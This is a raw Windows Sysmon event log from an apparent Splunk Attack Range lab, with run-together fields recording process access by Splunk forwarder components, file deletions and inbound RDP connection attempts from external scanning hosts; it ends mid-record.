10341000x800000000000000082515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.369{A7A01FEF-ECB0-607E-790F-00000000BB01}5488872C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.213{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-ECB0-607E-790F-00000000BB01}5488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.213{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.213{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.213{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.213{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.213{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-ECB0-607E-790F-00000000BB01}5488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.213{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-ECB0-607E-790F-00000000BB01}5488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.214{A7A01FEF-ECB0-607E-790F-00000000BB01}5488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.197{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E073A688727F5CD6657B973ED39ACD7E,SHA256=A0F1C1E576475BCAEC2F4D55D16305555DE9E40BB6C916FD10660D2F12EDC472,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051234Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:04.757{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=348F82CFB670CE436212D7745456E6B1,SHA256=2F0EEA31AB77BC0E795055B4F0A39F32409B9E8EB56DF0011851DFE0CEA492D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051233Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:02.751{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62918-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051232Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:04.460{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E238AD0BD7C202455F37D5382912E80,SHA256=6E1BF0BBB243A64D992B256C067662DDD0DD37899581587A9FAF519EEA3E22CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:05.979{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5C062041845E4410C807C88BEBADAC6,SHA256=ED2D728A454EFF780A8E0E352D91744EECA33B50A537E7935B64880B1BEB7B5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:05.229{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D523D0744FF72605642194BB8AA05629,SHA256=EF72DB51B45853D43FA0A35BD2C85D15AA1BDF62F5C771399E3C99481834E278,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051237Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:03.830{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52571-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000051236Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:03.265{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com49864-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051235Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:05.772{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD87A095C6354898BB8A9430C12DE8C8,SHA256=0F130242DDA4B54C4D9654C2261680DE51E0B72512E9E46A9AA5B8749ADBD366,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:06.869{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A61AF4C63D3523C9D31C80F6DF08D11,SHA256=0A258E6F95F9EE61CB0C47E29456C0EF79728B5B0555317DDB7E30369299F0B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:04.537{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51451-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000051240Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:04.484{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64373-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051239Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:06.776{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47F9EDF60A22012E40B74678DF76CFA5,SHA256=B3CC1F37ACC6D8456AC1EF7DBE23C57D408520912C2476F49249EF0C7662086C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051238Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:06.542{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F085495D059DB47FAD04F9DFFE673CB9,SHA256=B39D87030672B46C3AFF9AEC17AC449A59F0296A0E04CF858F95B4CB455E957F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:06.319{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com49893-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:06.100{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52800-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:05.747{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com51109-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000082539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:07.229{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-ECB3-607E-7B0F-00000000BB01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:07.229{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:07.229{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:07.229{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:07.229{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:07.229{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-ECB3-607E-7B0F-00000000BB01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:07.229{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-ECB3-607E-7B0F-00000000BB01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:07.230{A7A01FEF-ECB3-607E-7B0F-00000000BB01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:07.010{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFE4C22F6F35276299C6C90F0E0CB92F,SHA256=6EFA41109766C78001D68C03B96B94D5C07D3F118D82FB6329474C802310FC21,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051242Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:05.252{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63639-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051241Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:07.792{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D59D16345E312AD9AD3DE201A774084,SHA256=E48F811512BDE652ADF2F70FF4C37E322E6177B619EC7683F0B7A1327BDF3B27,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:07.276{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57679-false10.0.1.12-8000- 23542300x800000000000000082544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:08.072{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01C62CB792BE8C1AB1704CB8B3706E7C,SHA256=5953C48BA91E44F116946095410449ECCB96098A1E0B8099B7E8684DDE10EB77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:08.057{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84425C30FEF0C4BA5ED5E24688F446CE,SHA256=B3F495C8F3D3B41052D0002C45B9FC893B90A62F44033C6BECCB799E12EB7B6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051244Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:08.808{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 